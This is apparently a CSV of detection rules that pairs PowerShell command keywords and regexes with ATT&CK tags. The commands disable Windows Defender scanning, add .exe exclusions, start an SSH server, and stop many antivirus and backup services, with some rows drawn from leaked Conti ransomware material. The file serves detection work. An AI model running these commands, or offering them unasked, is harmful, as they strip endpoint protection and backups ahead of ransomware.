"*Set-MpPreference -DisableIOAVProtection $true*",".{0,1000}Set\-MpPreference\s\-DisableIOAVProtection\s\$true.{0,1000}","greyware_tool_keyword","powershell","Disable scanning all downloaded files and attachments","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Set-MpPreference -DisableRealtimeMonitoring $true*",".{0,1000}Set\-MpPreference\s\-DisableRealtimeMonitoring\s\$true.{0,1000}","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Set-MpPreference -DisableScriptScanning 1 *",".{0,1000}Set\-MpPreference\s\-DisableScriptScanning\s1\s.{0,1000}","greyware_tool_keyword","powershell","Disable AMSI (set to 0 to enable)","T1562.001 - T1562.002 - T1070.004","TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*Set-MpPreference -ExclusionExtension exe*",".{0,1000}Set-MpPreference\s\-ExclusionExtension\sexe.{0,1000}","greyware_tool_keyword","powershell","exclude exe file extensions from AV detections","T1562.001 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Akabanwa-toma/hacke/blob/aaebb5cb188eb3a17bebfedfbde6b354e5522b92/installer.bat#L29C21-L29C63","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A"
"*Set-Service -Name sshd -StartupType 'Automatic'*",".{0,1000}Set\-Service\s\-Name\ssshd\s\-StartupType\s\'Automatic\'.{0,1000}","greyware_tool_keyword","powershell","openssh server is used (critical on DC - must not be installed)","T1021.004 - T1133 - T1078.003","TA0008 - TA0005","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Start-Service sshd*",".{0,1000}Start\-Service\ssshd.{0,1000}","greyware_tool_keyword","powershell","openssh server is used (critical on DC - must not be installed)","T1021.004 - T1133 - T1078.003","TA0008 - TA0005","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Stop-Process -Name ""Sophos *",".{0,1000}Stop\-Process\s\-Name\s\""Sophos\s.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name ""SQL Backups""*",".{0,1000}Stop\-Process\s\-Name\s\""SQL\sBackups\"".{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name ""SQLsafe Backup Service""*",".{0,1000}Stop\-Process\s\-Name\s\""SQLsafe\sBackup\sService\"".{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name ""storagecraft imagemanager*""",".{0,1000}Stop\-Process\s\-Name\s\""storagecraft\simagemanager.{0,1000}\""","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name ""Symantec System Recovery""*",".{0,1000}Stop\-Process\s\-Name\s\""Symantec\sSystem\sRecovery\"".{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name ""Veeam Backup Catalog Data Service""*",".{0,1000}Stop\-Process\s\-Name\s\""Veeam\sBackup\sCatalog\sData\sService\"".{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name ""Zoolz 2 Service""*",".{0,1000}Stop\-Process\s\-Name\s\""Zoolz\s2\sService\"".{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name acronisagent*",".{0,1000}Stop\-Process\s\-Name\sacronisagent.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name AcronisAgent*",".{0,1000}Stop\-Process\s\-Name\sAcronisAgent.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name acrsch2svc*",".{0,1000}Stop\-Process\s\-Name\sacrsch2svc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name AcrSch2Svc*",".{0,1000}Stop\-Process\s\-Name\sAcrSch2Svc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name agntsvc*",".{0,1000}Stop\-Process\s\-Name\sagntsvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name Antivirus*",".{0,1000}Stop\-Process\s\-Name\sAntivirus.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name ARSM /y*",".{0,1000}Stop\-Process\s\-Name\sARSM\s\/y.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name arsm*",".{0,1000}Stop\-Process\s\-Name\sarsm.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name AVP*",".{0,1000}Stop\-Process\s\-Name\sAVP.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name backp*",".{0,1000}Stop\-Process\s\-Name\sbackp.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name backup*",".{0,1000}Stop\-Process\s\-Name\sbackup.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name BackupExec*",".{0,1000}Stop\-Process\s\-Name\sBackupExec.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name BackupExecAgent*",".{0,1000}Stop\-Process\s\-Name\sBackupExecAgent.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name bedbg /y*",".{0,1000}Stop\-Process\s\-Name\sbedbg\s\/y.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name cbservi*",".{0,1000}Stop\-Process\s\-Name\scbservi.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name cbvscserv*",".{0,1000}Stop\-Process\s\-Name\scbvscserv.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name DCAgent*",".{0,1000}Stop\-Process\s\-Name\sDCAgent.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name EhttpSrv*",".{0,1000}Stop\-Process\s\-Name\sEhttpSrv.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name ekrn*",".{0,1000}Stop\-Process\s\-Name\sekrn.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name EPSecurityService*    ",".{0,1000}Stop\-Process\s\-Name\sEPSecurityService.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name EPUpdateService*       ",".{0,1000}Stop\-Process\s\-Name\sEPUpdateService.{0,1000}\s\s\s\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name EsgShKernel*",".{0,1000}Stop\-Process\s\-Name\sEsgShKernel.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name ESHASRV*",".{0,1000}Stop\-Process\s\-Name\sESHASRV.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name FA_Scheduler*",".{0,1000}Stop\-Process\s\-Name\sFA_Scheduler.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name IMAP4Svc*",".{0,1000}Stop\-Process\s\-Name\sIMAP4Svc.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name KAVFS*",".{0,1000}Stop\-Process\s\-Name\sKAVFS.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name KAVFSGT*",".{0,1000}Stop\-Process\s\-Name\sKAVFSGT.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name kavfsslp*",".{0,1000}Stop\-Process\s\-Name\skavfsslp.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name klnagent*",".{0,1000}Stop\-Process\s\-Name\sklnagent.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name macmnsvc*",".{0,1000}Stop\-Process\s\-Name\smacmnsvc.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name masvc*",".{0,1000}Stop\-Process\s\-Name\smasvc.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MBAMService*",".{0,1000}Stop\-Process\s\-Name\sMBAMService.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MBEndpointAgent*    ",".{0,1000}Stop\-Process\s\-Name\sMBEndpointAgent.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name McAfeeEngineService*    ",".{0,1000}Stop\-Process\s\-Name\sMcAfeeEngineService.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name McAfeeFramework*",".{0,1000}Stop\-Process\s\-Name\sMcAfeeFramework.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name McAfeeFrameworkMcAfeeFramework*",".{0,1000}Stop\-Process\s\-Name\sMcAfeeFrameworkMcAfeeFramework.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name McShield*",".{0,1000}Stop\-Process\s\-Name\sMcShield.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name mfefire*",".{0,1000}Stop\-Process\s\-Name\smfefire.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name mfemms*",".{0,1000}Stop\-Process\s\-Name\smfemms.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name mfevtp*",".{0,1000}Stop\-Process\s\-Name\smfevtp.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name mozyprobackup*",".{0,1000}Stop\-Process\s\-Name\smozyprobackup.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MsDtsServer*",".{0,1000}Stop\-Process\s\-Name\sMsDtsServer.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MsDtsServer100*",".{0,1000}Stop\-Process\s\-Name\sMsDtsServer100.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MsDtsServer110*",".{0,1000}Stop\-Process\s\-Name\sMsDtsServer110.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name msftesql$PROD*",".{0,1000}Stop\-Process\s\-Name\smsftesql\$PROD.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSOLAP$SQL_2008*",".{0,1000}Stop\-Process\s\-Name\sMSOLAP\$SQL_2008.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSOLAP$SYSTEM_BGC*",".{0,1000}Stop\-Process\s\-Name\sMSOLAP\$SYSTEM_BGC.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSOLAP$TPS*",".{0,1000}Stop\-Process\s\-Name\sMSOLAP\$TPS.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSOLAP$TPSAMA*",".{0,1000}Stop\-Process\s\-Name\sMSOLAP\$TPSAMA.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$BKUPEXEC*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$BKUPEXEC.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*Stop-Process -Name MSSQL$ECWDB2*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$ECWDB2.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
